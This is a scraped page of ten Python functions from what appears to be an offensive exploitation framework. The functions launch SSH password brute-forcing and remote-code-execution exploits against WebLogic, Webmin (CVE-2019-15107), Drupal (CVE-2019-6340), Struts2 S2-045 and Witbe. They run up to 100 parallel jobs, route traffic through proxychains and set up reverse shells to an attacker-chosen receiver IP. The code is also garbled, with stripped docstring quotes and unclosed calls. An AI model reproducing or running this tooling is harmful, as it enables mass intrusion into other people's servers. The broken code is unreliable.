예제 #1
def ssh_bruteforcer(session):
    call single thread ssh_bruteforcer
    password_list = console.input_check(
        "[*] Password list file to use: ", allow_blank=False)
    if not os.path.isfile(password_list):
        console.print_error("[-] Password list not found")
        return None

    # command to exec
    command = console.input_check("[*] Command to exec: ", allow_blank=False)

    # args list
    exploit = 'ssh_bruteforce.py'
    work_path = '/ssh-bruteforce/'
    exec_path = exploit
    custom_args = str(password_list + ' ' + command).split()
    jobs = 100

    print(colors.BLUE +
          '[*] Your exploit will be executed like\n' +
          'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path,
                                                                      ' '.join(custom_args)))
    # start scanner
    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #2
def ssh_bruteforcer(session):
    bruteforce one target using a password list
    colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)
    password_list = console.input_check(
        "[*] Password list file to use (put them under ./data): ", allow_blank=False,

    if not os.path.isfile(password_list):
        console.print_error("[-] Password list not found")

        return None

    # command to exec
    command = console.input_check("[*] Command to exec: ", allow_blank=False)

    # args list
    exploit = 'ssh_bruteforce.py'
    work_path = '/ssh-bruteforce/'
    exec_path = exploit
    custom_args = ["-p", password_list, "-c", command]
    jobs = 100

    # start scanner

    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #3
def weblogic(session):
    with reverse shell
    print(colors.BLUE +
          '\n[*] Welcome to Weblogic getshell exploit' +

    server_port = console.input_check(
        "[?] What's the port of Welogic server? ",
    os_type = console.input_check(
        '[?] Windows or Linux? [w/l] ', choices=['w', 'l'])
    if console.input_check('[?] Do you need a reverse shell? [y/n] ',
                           choices=['y', 'n']) == 'y':
        shell_server = console.input_check(
            '[?] What\'s the IP of shell receiver? ',
            allow_blank=False, ip_check=True)
        port = console.input_check(
            '[?] What\'s the port of shell receiver? ',
        if os_type.lower() == 'w':
            custom_args = '-l {} -p {} -P {} --silent -T '.format(
                shell_server, port, server_port) +\
                'reverse_shell -os win'
            custom_args = custom_args.split()
        elif os_type.lower() == 'l':
            custom_args = '-l {} -p {} -P {} --silent -T '.format(
                shell_server, port, server_port) +\
                'reverse_shell -os linux'
            custom_args = custom_args.split()
            console.print_error('[-] Invalid input')
            return None
        cmd = console.input_check(
            '[?] What command do you want to execute on the target? ',
        if os_type.lower() == 'w':
            custom_args = '-P {} --silent -T exploit -c {} -os win'.format(
                server_port, cmd).split()
        elif os_type.lower() == 'l':
            custom_args = '-P {} --silent -T exploit -c {} -os linux'.format(
                server_port, cmd).split()
            return None

    # start scanner
    exploit = 'weblogic.py'
    work_path = '/weblogic/'
    exec_path = exploit
    jobs = 100
    # waitTime = 25  # deprecated
    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #4
def webmin_cve_2019_15107(session):
    CVE_2019_15107 RCE
    colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)

    # shell server config
    command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    # exploit config
    exploit = 'webmin.py'
    work_path = '/webmin/'
    exec_path = exploit
    custom_args = ["-c", command]
    jobs = 50

    # start scanner

    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #5
def witbe(session):
    witbe rce
    colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)

    # shell server config
    rhost = console.input_check('[?] IP of your shell server: ', ip_check=True)
    rport = console.input_check('[?] and Port? ', check_type=int)

    # exploit config
    exploit = 'witbe.py'
    work_path = '/witbe/'
    exec_path = exploit
    custom_args = ["-l", rhost, "-p", rport]
    jobs = 50

    # start scanner

    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #6
def drupal_cve20196340(session):
    drupal RCE
    colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)

    # shell server config
    command = console.input_check('[?] Command to execute on the target: ',

    # exploit config
    exploit = 'cve-2019-6340_cmd.py'
    work_path = '/drupal/'
    exec_path = exploit
    custom_args = ["-c", command]
    jobs = 50

    # start scanner

    return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
예제 #7
def weblogic_cve201710271(session):
        '\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)

    # shell server config
    command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    # exploit config
    exploit = 'weblogic_cve-2017-10271.py'
    work_path = '/weblogic/'
    exec_path = exploit
    custom_args = ["-c", command]
    jobs = 50

    # start scanner

    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #8
def witbe(session):
    witbe rce
    print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END)

    # shell server config
    rhost = console.input_check('[?] IP of your shell server: ')
    rport = console.input_check('[?] and Port? ', check_type=int)

    # exploit config
    exploit = 'witbe.py'
    work_path = '/witbe/'
    exec_path = exploit
    custom_args = str('-l ' + rhost + ' -p ' + rport).split()
    jobs = 50
    print(colors.BLUE +
          '[*] Your exploit will be executed like\n' +
          'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path),
          ' '.join(custom_args))
    # start scanner
    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #9
def s2_045(session):
    struts2 045 rce
    print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END)
    port = console.input_check(
        '[?] What\'s the port of your target server? ',

    # args list
    exploit = 's2_045_cmd.py'
    work_path = '/structs2/'
    exec_path = exploit
    custom_args = str('-p ' + port).split()
    jobs = 100

    print(colors.BLUE +
          '[*] Your exploit will be executed like\n' +
          'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path,
                                                                      ' '.join(custom_args)))
    # start scanner
    return core.Scanner(work_path, exec_path, custom_args, jobs, session)
예제 #10
def weblogic_cve201710271(session):
    colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271',

    # shell server config
    command = console.input_check('[?] Command to execute on the target: ',
    target_os = console.input_check(
        "[?] Target OS, default to linux [linux/win]: ",
        choices=["linux", "win"])

    # exploit config
    exploit = 'weblogic_cve-2017-10271.py'
    work_path = '/weblogic/'
    exec_path = exploit
    custom_args = ["-c", command, "-os", target_os]
    jobs = 50

    # start scanner

    return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)